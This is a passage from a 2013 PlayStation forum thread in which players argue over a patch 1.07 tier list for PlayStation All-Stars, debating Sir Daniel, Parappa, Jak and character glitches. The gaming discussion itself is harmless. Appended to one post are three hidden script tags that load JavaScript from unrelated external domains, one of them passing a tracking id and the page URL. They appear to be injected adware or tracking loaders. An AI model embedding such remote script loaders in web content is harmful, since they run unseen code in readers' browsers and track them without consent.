Uncharted Territory
1360 posts

Re: Patch 1.07 TIER LIST scrubbies!!!!!!!!

[ Edited ]
Feb 18, 2013

Maybe you should think before you start insulting someone's intelligence in an argument. It just makes you look bad.

I already put down multiple reasons as to why Sir Dan can fight most of the cast regardless of his learning curve yet you completely ignored it. That shows not only are you unable to comprehend character abilities into a tier list but you also cannot grasp the strategies involved in winning matches with that character.

You make it out to sound like he's completely broken and unwinnable in matches which is untrue. The same can be said for Jak. As for the higher levels of play quote, you stated that Dan can be good when learned but ultimately he's useless in high level play. Yet I see him being played in high level play in the tourneys and he fairs just fine. So I'm absolutely baffled at why you claim that he's apparently inept in those situations.

Image and video hosting by TinyPic
Message 51 of 73 (275 Views)
0 Likes
Fender Bender
2925 posts

Feb 18, 2013
Parappa deserves A-Teir, I demand it!
Message 52 of 73 (266 Views)
0 Likes
Hekseville Citizen
386 posts

Feb 18, 2013

Your comment didn't make sense at all while you said that mine didn't, can he be played at high level? yes, can he win? no, why? because he's unviable

and maybe you should think before you start telling that someone's ignoring you, because I clearly didn't, and I read every comment you posted on the thread, I just don't agree with your point of view, maybe you see Sir Daniel as a god tier since you main him (I believe for your signature), but as a neutral player (I use Sir Daniel every now and then too) I can tell that he is just not as strong as the rest of the cast, I would consider that Jak is higher than a D tier, but Sir Daniel? hell no, he's just really bad.

Message 53 of 73 (263 Views)
0 Likes
Hekseville Citizen
386 posts

Feb 18, 2013

harley2947 wrote:
Parappa deserves A-Teir, I demand it!

I actually think I underestimated him lol Smiley Tongue but no way he's as good as ratchet, a B tier seems fine don't you think?

Message 54 of 73 (261 Views)
0 Likes
Uncharted Territory
1360 posts

[ Edited ]
Feb 18, 2013

lxhizy wrote:

Your comment didn't make sense at all while you said that mine didn't, can he be played at high level? yes, can he win? no, why? because he's unviable

and maybe you should think before you start telling that someone's ignoring you, because I clearly didn't, and I read every comment you posted on the thread, I just don't agree with your point of view, maybe you see Sir Daniel as a god tier since you main him (I believe for your signature), but as a neutral player (I use Sir Daniel every now and then too) I can tell that he is just not as strong as the rest of the cast, I would consider that Jak is higher than a D tier, but Sir Daniel? hell no, he's just really bad.

You're unbelievable. You just said he was unviable for high level play right after you said he can be played at high level. If someone can be played at a high level, how are they unviable for high level play? And once again it doesn't make sense because I see him win high level matches.

First you insult my intelligence and now you're judging me based on my signature? Seriously? (I do main him though but that doesn't change anything other than the fact I know him better than others. And I practice with every character in the roster to understand their abilities, pros and cons.)

No I don't see Dan as God tier. He's C Tier at best, at least four spots from the bottom. In high levels of 1 v 1 play, Radec is the worst, Dante is almost unplayable now according to Pb_Mal and I begrudgingly agree. So according to your logic, Radec and Dante should be put at the bottom as well right next to Dan and Jak. That's utterly proposterous because people use both of them in tourneys regardless and we all know Radec and Dante are mid-to-high on a tier list despite their glaring shortcomings. 

Face it, you put Dan on bottom tier simple because a) You couldn't play him as well as others in "high level play" b) You judged him solely on his supers instead of him overall and c) Because people who main him couldn't beat you. Period.

And don't compare Soul Calibur to All-stars. Those are two different beasts. 

Message 55 of 73 (254 Views)
0 Likes
Splicer
58 posts

[ Edited ]
Feb 18, 2013

Spike id say B, Raiden S, Drake A+ - S (dependent on how much AK spam) Good Cole A+, also Jak should be a B - A- just because of learning curve, but he is one of the best in the game

Message 56 of 73 (250 Views)
0 Likes
Survivor
2138 posts

Feb 19, 2013
people need to learn what to get angry over lol
Message 57 of 73 (230 Views)
0 Likes
Gaming Beast
2167 posts

Feb 19, 2013
Okay a few things:

With his glitches, Parappa can currently generate hundreds of AP in seconds, and he has 6 infinites. He's definitely a solid character.

Dan on the other hand... Ehhhh... See, here's the problem: He has a pretty solid moveset, and that axe is one of the better moves in the game. He can keep people out, he can combo, etc. HOWEVER, he can't kill. This isn't a "I don't know how to play him" thing, this is a he legitimately can't kill an opponent who knows how he works.

I used to play him as a 3rd until Asis showed me you can avoid literally every setup Dan can do into supers. You can glitch his level 3 to make it impossible to kill with. His level 2 setups can FOR SOME STUPID REASON be avoided simply holding left or right to tech away from the dot when you do the U.Square combos into it since apparently the beam doesn't kill after all. In other situations, that dot is easy as **bleep** to avoid.

For level 1 setups, teching down AND buffering a roll makes you safe with every character.

Basically, the only way he's going to kill is to use supers as an anti-air, for which his 1 is way more effective, and as soon as he hits 2 it becomes ridiculously hard for him to kill.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 58 of 73 (221 Views)
0 Likes
Lombax Warrior
251 posts

Feb 19, 2013
Silly people, TIRES DON EXITS
Message 59 of 73 (217 Views)
0 Likes
Uncharted Territory
1360 posts

[ Edited ]
Feb 19, 2013

Fromundaman wrote:
Okay a few things:

With his glitches, Parappa can currently generate hundreds of AP in seconds, and he has 6 infinites. He's definitely a solid character.

Dan on the other hand... Ehhhh... See, here's the problem: He has a pretty solid moveset, and that axe is one of the better moves in the game. He can keep people out, he can combo, etc. HOWEVER, he can't kill. This isn't a "I don't know how to play him" thing, this is a he legitimately can't kill an opponent who knows how he works.

I used to play him as a 3rd until Asis showed me you can avoid literally every setup Dan can do into supers. You can glitch his level 3 to make it impossible to kill with. His level 2 setups can FOR SOME STUPID REASON be avoided simply holding left or right to tech away from the dot when you do the U.Square combos into it since apparently the beam doesn't kill after all. In other situations, that dot is easy as **bleep** to avoid.

For level 1 setups, teching down AND buffering a roll makes you safe with every character.

Basically, the only way he's going to kill is to use supers as an anti-air, for which his 1 is way more effective, and as soon as he hits 2 it becomes ridiculously hard for him to kill.

If that's the case then this should be fixed right away. Along with Dante and Radec.

Also, I thought they fixed Dan's lvl 3 glitch? And doesn't that require proper timing to execute?

Looks like I need to re-evaluate a few things.

Message 60 of 73 (210 Views)
0 Likes